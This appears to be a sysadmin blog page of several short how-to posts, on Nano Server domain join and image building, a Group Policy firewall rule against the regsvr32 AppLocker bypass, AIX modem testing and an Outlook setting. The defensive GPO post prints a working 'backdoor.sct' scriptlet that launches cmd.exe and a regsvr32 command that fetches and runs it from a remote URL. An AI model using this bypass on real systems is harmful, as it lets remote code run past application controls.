Join Nano Server to a Domain

To join my Windows Server 2016 Nano server to my test domain I used the djoin.exe (Domain Join) command.

From a domain controller, or server already joined to my domain, I run the following command.  This will create a file called NANOSERVERTP5 at the location I run the command.

(Change items hilighted in Red)

djoin.exe /provision /domain TESTDOMAIN /machine NANOSERVERTP5 /reuse /savefile .NANOSERVERTP5

2016-04-28_010017

Copy the NANOSERVERTP5 file to C: on the Nano Server.  I temporarily enabled File and Sharing through the Firewall on the Nano Server in order to gain access to the Administrative share, so I could copy it to 192.168.100.50c$.

In order to enter into a remote Powershell session, I needed to make sure I had a trusted host entry for my Nano Server in Web Services Management (WS-Management, or WSMan).  I launched an administrative Powershell shell.  Also, make sure WinRM service is running on the machine you’ll be using (net start winrm).

(Change items hilighted in Red)

Set-Item WSMan:localhostClientTrustedHosts -Value 192.168.100.50 -Concatenate

Accept (Y) the WinRM security prompt.

Start a remote PowerShell session into the Nano Server.

Enter-PSSession -ComputerName 192.168.100.50 -Credential Administrator

Run djoin and specify the location that NANOSERVERTP5 file was copied to; in my case, C:NANOSERVERTP5.

djoin /requestodj /loadfile c:NANOSERVERTP5 /windowspath c:windows /localos

Create Nano Server Image

I was trying to build a Nano Server image (2016 Tech Preview 5) and kept getting the following error:

2016-04-28_120004

Turns out that is because the documentation is not updated and instead of -GuestDrivers it now uses:

  1. -Edition [ Standard | Datacenter]
  2. -DeploymentType [ Guest | Host ]

Running the following updated command works without issue building the image.

(Change items hilighted in Red)

New-NanoServerImage -MediaPath c:tp5iso -BasePath .Base -TargetPath .Nano1Nano3.vhd -ComputerName Nano3 -DeploymentType Guest -Edition Standard

Add Packages

You can add packages to the image that is being built by specifying -Packages [PackageName].

To install IIS, for example:
(Change items hilighted in Red)

New-NanoServerImage -MediaPath c:tp5iso -BasePath .Base -TargetPath .Nano1Nano3.vhd -ComputerName Nano3 -DeploymentType Guest -Edition Standard -Packages Microsoft-NanoServer-IIS-Package

Here’s a listing of the Packages in the Server 2016 TP5 ISO as of this writing.

I used the following command within the Packages directory of the Nano distribution to generate this.

PS C:usersrkreiderdesktopnanobasePackages> gci . -filter *.cab | foreach-object { write-output $_.basename; dism /online /get-packageinfo /packagepath:$_ | select-string Description|Product Name|^Name :; }
  • Microsoft-NanoServer-BootFromWim-Package
    Description : Boot from WIM support
    Name : Boot from WIM support
    Product Name : Microsoft-NanoServer-BootFromWim-Feature-Package
  • Microsoft-NanoServer-Compute-Package
    Description : Hyper-V provides the services that you can use to create and manage virtual machines and their resources. Each virtual machine is a virtualized computer system that operates in an isolated execution environment. This allows you to run multiple operating systems simultaneously.
    Name : Hyper-V
    Product Name : Microsoft-NanoServer-Compute-Feature-Package
  • Microsoft-NanoServer-Containers-Package
    Description : Provides services and tools to create and manage Windows Server Containers and their resources.
    Name : Containers
    Product Name : Microsoft-NanoServer-Containers-Feature-Package
  • Microsoft-NanoServer-DCB-Package
    Description : Data Center Bridging (DCB) is a suite of IEEE standards that are used to enhance Ethernet local area networks by providing hardware-based bandwidth guarantees and transport reliability. Use DCB to help enforce bandwidth allocation on a Converged Network Adapter for offloaded storage traffic such as Internet Small Computer System Interface, RDMA over Converged Ethernet, and Fibre Channel over Ethernet.
    Name : Data Center Bridging
    Product Name : Microsoft-NanoServer-DCB-Feature-Package
  • Microsoft-NanoServer-Defender-Package
    Description : Windows Server Antimalware helps protect your machine from malware.
    Name : Windows Server Antimalware
    Product Name : Microsoft-NanoServer-Defender-Feature-Package
  • Microsoft-NanoServer-DNS-Package
    Description : Domain Name System (DNS) Server provides name resolution for TCP/IP networks. DNS Server is easier to manage when it is installed on the same server as Active Directory Domain Services. If you select the Active Directory
    Domain Services role, you can install and configure DNS Server and Active Directory Domain Services to work together.
    Name : DNS Server
    Product Name : Microsoft-NanoServer-DNS-Feature-Package
  • Microsoft-NanoServer-DSC-Package
    Description : Windows PowerShell Desired State Configuration is a configuration management platform that uses a declarative syntax to express and enact system configuration state.
    Name : Windows PowerShell Desired State Configuration
    Product Name : Microsoft-NanoServer-DSC-Feature-Package
  • Microsoft-NanoServer-FailoverCluster-Package
    Description : Failover Clustering allows multiple servers to work together to provide high availability of server roles. Failover Clustering is often used for File Services, virtual machines, database applications, and mail applications.
    Name : Failover Clustering Service
    Product Name : Microsoft-NanoServer-FailoverCluster-Feature-Package
  • Microsoft-NanoServer-Guest-Package
    Description : Hyper-V guest drivers for using Nano Server as a virtual machine
    Name : Hyper-V guest drivers
    Product Name : Microsoft-NanoServer-Guest-Feature-Package
  • Microsoft-NanoServer-Host-Package
    Description : Support for bare metal deployments
    Name : Bare metal deployment
    Product Name : Microsoft-NanoServer-Host-Feature-Package
  • Microsoft-NanoServer-IIS-Package
    Description : Web Server (IIS) provides a reliable, manageable, and scalable Web application infrastructure.
    Name : Web Server (IIS)
    Product Name : Microsoft-NanoServer-IIS-Feature-Package
  • Microsoft-NanoServer-NPDS-Package
    Description : Network Performance Diagnostics Service (NPDS)
    Name : Network Performance Diagnostics Service (NPDS)
    Product Name : Microsoft-NanoServer-NPDS-Feature-Package
  • Microsoft-NanoServer-OEM-Drivers-Package
    Description : Server Core drivers
    Name : Server Core drivers
    Product Name : Microsoft-NanoServer-OEM-Drivers-Feature-Package
  • Microsoft-NanoServer-SCVMM-Compute-Package
    Description : System Center Virtual Machine Manager Hyper-V agent
    Name : System Center Virtual Machine Manager Hyper-V agent
    Product Name : Microsoft-NanoServer-SCVMM-Compute-Feature-Package
  • Microsoft-NanoServer-SCVMM-Package
    Description : System Center Virtual Machine Manager agent
    Name : System Center Virtual Machine Manager agent
    Product Name : Microsoft-NanoServer-SCVMM-Feature-Package
  • Microsoft-NanoServer-SecureStartup-Package
    Description : Secure Startup support
    Name : Secure Startup support
    Product Name : Microsoft-NanoServer-SecureStartup-Feature-Package
  • Microsoft-NanoServer-ShieldedVM-Package
    Description : Host Guardian provides the features necessary on a Hyper-V server to provision Shielded Virtual Machines.
    Name : Shielded VM support
    Product Name : Microsoft-NanoServer-ShieldedVM-Feature-Package
  • Microsoft-NanoServer-Storage-Package
    Description : File Server role and other storage components
    Name : File Server role and other storage components
    Product Name : Microsoft-NanoServer-Storage-Feature-Package

GPO to block regsvr32 AppLocker Bypass Vulnerability

A recently discovered method of bypassing AppLocker by using regsvr32.exe, poses a threat to users on Windows 7, 8/8.1, and 10 (Professional or Enterprise editions).  To work around this issue and prevent regsvr32 from accessing remote resources, you can block regsvr32.exe in the Windows Firewall.  Taking it a step further, I have added a new GPO to block this domain-wide within my company. Here are some of my notes.

Create a GPO and Edit

In Group Policy Management, I created a new GPO and named it Firewall:  Block regsvr32 then I edited it.

Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security

Add a rule to both Inbound Rules and Outbound Rules to block regsvr32.exe.

2016-04-27_111611

Create a new inbound rule to block regsvr32.exe

Inbound Rule Wizard

2016-04-27_111627

Choose Program as the type of rule to create and click Next >

2016-04-27_111642

Use C:windowssystem32regsvr32.exe as the path; you can either type it in or click Browse… to navigate to it and choose.

2016-04-27_111651

Choose Block as the action and click Next >

2016-04-27_111659

Apply it to all network locations.

2016-04-27_111717

Give the rule a name and possibly a description.

2016-04-27_111733

Rule to block is now listed in Inbound Rules

Outbound Rule Wizard

Repeat the steps from the Inbound Rule Wizard, but as a new Outbound Rules rule.

Link GPO

Now that the GPO is created, you can link the policy within your domain as usual.

Testing

To test that the rule is effective, run gpupdate /force on your system to force an immediate security group policy application.

I’ll leave the following backdoor.sct on my server if you want to test against it, but you can also save the following to a file and save it (doesn’t have to be extension .SCT, can be anything…).

backdoor.sct

<?XML version=1.0?>
<scriptlet>
<registration
 progid=Empire
 classid={F0001111-0000-0000-0000-0000FEEDACDC} >
 <!-- Proof Of Concept - Casey Smith @subTee -->
 <script language=JScript>
 <![CDATA[

 var r = new ActiveXObject(WScript.Shell).Run(cmd.exe);

 ]]>
</script>
</registration>
</scriptlet>

Command to run:

regsvr32 /s /n /u /i:https://techish.net/pub/backdoor.sct scrobj.dll

If a command window opens, the GPO created is not blocking it (for one reason or another; double-check your work).

Test Dial on Modem in AIX

Had an issue with dialout on an AIX system this morning.  Problem resolved, but I learned a pretty handy little command for testing dial-out (I didn’t have a buttset with me).

Using cu -n -d -l tty2, I can dial-out to my cellphone to help in troubleshooting the problem.

# cu -n -d -l tty2
Please enter the number: xxxxxxxxxx
altconn called
Device Type ACU wanted
ttylock tty2 succeeded
Attempting to open /dev/tty2
clear O_NDELAY
filelock: ok
fixline(7, 19200)
gdial(fcmulhays) called
expect: ("")
got it
sendthem (DELAY
AT^M)
expect: (OK)
AT^M^M^JOKgot it
sendthem (PAUSE
nap(25) ATE1QV1M1Y1&R&D&E7#PDTxxxxxxxxxx^M)
expect: (CONNECT)
^M^JATE1QV1M1Y1&R&D&E7#PDTxxxxxxxxxx^M^Z[1] + Stopped (SIGTSTP)

Here we see it dial the number, my cellphone (indicated with X’s — creepers!).

This failed so I ^C the process. I reworked some of the terminations on the block from demarc and tried again. The next time was successful and I had received the dial-out call from AIX.

Speed up Send/Receive in Outlook 2013 Synchronized Folders

Ran into a performance issue for an end-user today where the Send/Receive process was hanging on synchronizing subscribed folders.

One method to help speed up this process was to disable calculating the number of unread items each in subscribed folder that are synchronizing.

Step 1

Click on Send/Receive tab in the Ribbon and then click Send/Receive Groups and choose Define Send/Receive Groups

2016-04-25_113309

Step 2

Click Edit in the right pane

2016-04-25_113317

Step 3

Uncheck Get folder unread count for subscribed folders and click OK

2016-04-25_113331